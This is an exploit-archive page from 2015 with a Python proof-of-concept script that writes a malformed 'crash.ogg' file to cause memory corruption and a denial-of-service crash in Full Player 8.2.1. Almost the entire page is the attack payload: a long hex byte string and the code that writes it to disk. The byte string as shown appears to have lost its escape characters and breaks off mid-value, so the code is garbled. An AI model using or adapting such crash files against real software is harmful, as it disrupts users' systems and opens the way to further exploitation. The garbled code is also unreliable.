Home / exploits Full Player 8.2.1 Memory Corruption
Posted on 15 July 2015
#!/usr/bin/python #[+] Author: SATHISH ARTHAR #[+] Exploit Title: Full Player 8.2.1 Memory Corruption PoC #[+] Date: 13-07-2015 #[+] Category: DoS/PoC #[+] Tested on: WinXp/Windows 7 #[+] Vendor: http://www.fplayer.net #[+] Download: http://www.fplayer.net/full_player.exe #[+] Sites: sathisharthars.wordpress.com #[+] Twitter: @sathisharthars #[+] Thanks: offensive security (@offsectraining) import os os.system("color 02") print"###########################################################" print"# Title: Full Player-8.2.1 Memory Corruption PoC #" print"# Author: SATHISH ARTHAR #" print"# Category: DoS/PoC # " print"###########################################################" crash=("x4Fx67x67x53x00x02x00x00x00x00x00x00x00x00x55x0Bx00x00x00x00x00x00xC7x72x7Cx6Fx01x1Ex01x76x6Fx72x62x69x73x00x00x00x00x05x99xACx00x00xFDxFFxCFxFCx09xFFx99x0FxF9x0Fx8Fx7FxB9x01x4Fx67x67x53x00x00x00x00x00x00x00x00x00x00x55x0Bx00x00x01x00x00x00x15x5Ax7Ex0Cx11x4AxFFxFFxFFxFFxFFxFFxFFxFFxFFxFFxFFxFFxFFxFFxFFxFFx03x76x6Fx72x62x69x73x00x00x00x00x58x69x70x68x2Ex4Fx72x67x20x6Cx69x62x56x6Fx72x62x69x73x20x49x20x32x30x30x32x30x37x31x37x01x00x00x00x19x00x00x00x53x6Fx6Ex79x20x4Fx67x67x20x56x6Fx72x62x69x73x20x31x2Ex30x20x46x69x6Ex61x6Cx01x05x76x6Fx72x62x69x73x29x42x43x56x01x00x08x00x00x80x22x4Cx20xC3x80xD0x90x55x00x00x10x00x00x80xA8x36x14x6BxA9xB1xD6x1Ax63xA1x28x46xD4x62x6Ax31xC6x18x63xE3x2Cx46x90x62x8Bx31xC6x18x63x8Cx31xC6x18x63x8Cx31xC6x18x63x20x34x64x15x00x00x04x00x40x31xEAx15x93x9Ex42xCCx39xE7xDCx18xA6x8Dx51xDAx29xC7x39xE7xDCx18xC5x89x30x58x21xA5xB9xA5x9Ax52xCCxA1x93x9Cx4AxCAx39xE7x1Cx08x0Dx59x05x00x00x02x00x40x48x21x85x14x52x48x21x85x14x52x48x21x85x14x52x4Ax29xA5x94x62x8Ax29xA6x98x62x8Ax29xA6x98x72xCCx31xC7x1Cx83x0Cx32xE8xA4x93x4Ex3AxE9x24xA4x90x42x09xA5xA4x92x52x4AxADxC5x1Ax6BxEFxBDxF7x9Ex7BxEFxBDxF7xDEx7BxEFxBDxF7xDEx7BxEFxBDxF7xDEx7BxCFx39x07x42x43x56x01x00x20x00x00x04x42x06x21x84x10x42x08x21x84x14x52x48x21xA6x98x62xCAx29xA7x80xD0x90x55x00x00x20x00x80x00x00x00x00x4BxB1x14x4DxD1x1CxCFxF1x1CxCFx11x1Dx53x12x25x53x32x25x53x72x2DxD7x32x2Dx53x33x3DxD3x33x45x55x74x55x53x55x65xD7x75x65x53x36x65x53x36x65x55x36x65x53x36x65x53x36x65xD5x95x65x59x96x65x59x96x65x59x96x65x59x96x65x59x96x65x20x34x64x15x00x20x01x00xA0x23x39x92x23x29x8ExE2x38x8ExE3x48x92x04x84x86xACx02x00x64x00x00x04x00x60x28x8AxA3x48x8Ex24x59x92x65x59x96x67x99x9AxE9x99x9Ex69x9AxA6x69x9AxA6x09x84x86xACx02x00x00x01x00x04x00x00x00x00x00xA0x69x9AxA6x69x9AxA6x69x9AxA6x69x9AxA6x69x9AxA6x69x9AxA6x69x9Ax66x59x96x65x59x96x65x59x96x65x59x96x65x59x96x65x59x96x65x59x96x65x59x96x65x59x96x65x59x96x65x59x96x65x59x96x65x59x40x68xC8x2Ax00x40x02x00x40xC7x71x1CxC7x71x1CxC7x71x1Cx47x72x24x07x08x0Dx59x05x00xC8x00x00x08x00x40x52x24xC5x72x34x47x73x34xC7x73x3Cx47x74x44x47x94x4Cx49x95x5Cx4BxB6x64x0Dx08x0Dx59x05x00x00x02x00x08x00x00x00x00x00x40x33x2Cx43x53x3Cx47xB3x44x4DxD4x44x51xF4x44x4Fx14x45xD1xF3x3CxCFxF3x3CxCFxF3x3CxCFxF3x3CxCFxF3x3CxCFxF3x3CxCFxF3x3CxCFxF3x3CxCFxF3x3CxCFxF3x3CxCFxF3x3CxCFxF3x3CxCFxF3x3CxCFxF3x80xD0x90x55x00x00x04x00x00x01x9Dx66x98x6Ax80x08x33x92x59x20x34x64x15x00x80x00x00x00x10x81x0Cx53x0Cx08x0Dx59x05x00x00x04x00x00x48x91xE4x24x89x92x93x52x4Ax39x0Cx92xC5x24xA9x94x93x52x4Ax79x14x93x47x35xC9x18x94x52x4Ax29xA5x94x52x4Ax29xA5x94x52x4Ax29x0Cx92xE5x28xA9x94x93x52x4Ax49x8Cx92xC5x28xA9x52x93x52x4Ax79x94x93x27x35xC9xD8x93x52x4Ax29xA5x94x52x4Ax29xA5x94x52x4Ax59x90x92x27x2DxE9x1Ax94x52x4Ax49x8Ex92x06x2DxD9xD4x93x52x4Ax89x52x94x28x39xD9x9Ex94x52x4Ax29xA5x94x52x4Ax29xA5x94x52x4AxF9xA0x94x0Fx42x29xA5x94x52x4AxB9xDAx93x6Bx3Dx29xA5x94x52x4Ax19xA3x94xF0x49x29xA5x94x52x4Ax29xA5x94x52x4Ax29xA5x94x52xCAx08x42x43x56x01x00x40x00x00x80x71xD6x28x87xA2x93xE8x7Cx71x86x72xA6x29x48x2Ax94x26x74x6Fx92xA3xE4x39xC9xADxB4xDCx9Cx6ExC2x39xA7x9Bx53xCExF9xE4x9Cx73x82xD0x90x55x00x00x20x00x00x84x10x52x48x21x8 filename = "crash.ogg" file = open(filename , "w") file.write(crash) print " Files Created! " file.close()
